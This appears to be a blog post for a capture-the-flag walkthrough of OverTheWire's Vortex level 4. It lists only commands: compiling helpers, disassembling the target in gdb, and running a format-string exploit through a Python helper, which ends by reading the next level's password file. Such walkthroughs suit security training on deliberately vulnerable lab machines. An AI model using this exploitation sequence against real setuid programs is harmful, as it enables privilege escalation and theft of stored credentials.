# ssh vortex4@vortex.labs.overthewire.org
$ file /vortex/vortex4
$ mkdir /tmp/v4
$ cd /tmp/v4
$ cat execve.c
$ gcc -m32 -o execve execve.c
$ cat getenvaddr.c
$ gcc -m32 -o getenvaddr getenvaddr.c
$ cat format_string.py
$ gdb /vortex/vortex4
(gdb) set disassembly-flavor intel
(gdb) disassemble main
$ readelf -r /vortex/vortex4
$ ./execve /tmp/v4/getenvaddr `./format_string.py findinit 0xffffffff 0804a014 0 104 5`
$ ./execve /tmp/v4/getenvaddr `./format_string.py findinit 0xffffdf83 0804a014 0 104 5`
$ ./execve /vortex/vortex4 `./format_string.py findinit 0xffffdf85 0804a014 0 104 5`; echo
%104 = init
$ ./execve /vortex/vortex4 `./format_string.py exploit 0xffffdf85 0804a014 0 104 5`; echo
$ whoami
$ /bin/cat /etc/vortex_pass/vortex5
No comments:
Post a Comment